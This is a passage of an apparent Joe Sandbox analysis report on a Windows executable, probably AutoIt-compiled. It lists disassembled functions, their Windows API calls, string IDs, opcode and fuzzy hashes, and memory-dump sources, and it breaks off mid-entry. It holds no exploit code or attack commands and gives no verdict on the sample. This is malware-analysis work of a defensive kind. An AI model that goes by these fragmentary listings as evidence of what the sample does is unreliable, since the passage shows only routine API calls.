                                                                                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                              Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                              Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                              • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                                                                              • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                                                                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                              • String ID:
                                                                                              • API String ID: 3771399671-0
                                                                                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                              Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                              Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 0-1603158881
                                                                                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                              Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                              • DestroyWindow.USER32(?), ref: 00426F50
                                                                                              • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                              • String ID: close all$Wu
                                                                                              • API String ID: 4174999648-1790509019
                                                                                              • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                              • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                              Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMenu.USER32 ref: 00448603
                                                                                              • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                              • IsMenu.USER32(?), ref: 004486AB
                                                                                              • CreatePopupMenu.USER32 ref: 004486B5
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                              • DrawMenuBar.USER32 ref: 004486F5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                              • String ID: 0
                                                                                              • API String ID: 161812096-4108050209
                                                                                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                              Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                              • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                              Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                              Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 978794511-0
                                                                                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                              Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                              Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                              Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_memcmp
                                                                                              • String ID: '$\$h
                                                                                              • API String ID: 2205784470-1303700344
                                                                                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                              Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                              • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                              • __swprintf.LIBCMT ref: 0045EC33
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                              Strings
                                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 2441338619-1568723262
                                                                                              • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                              • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                              Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
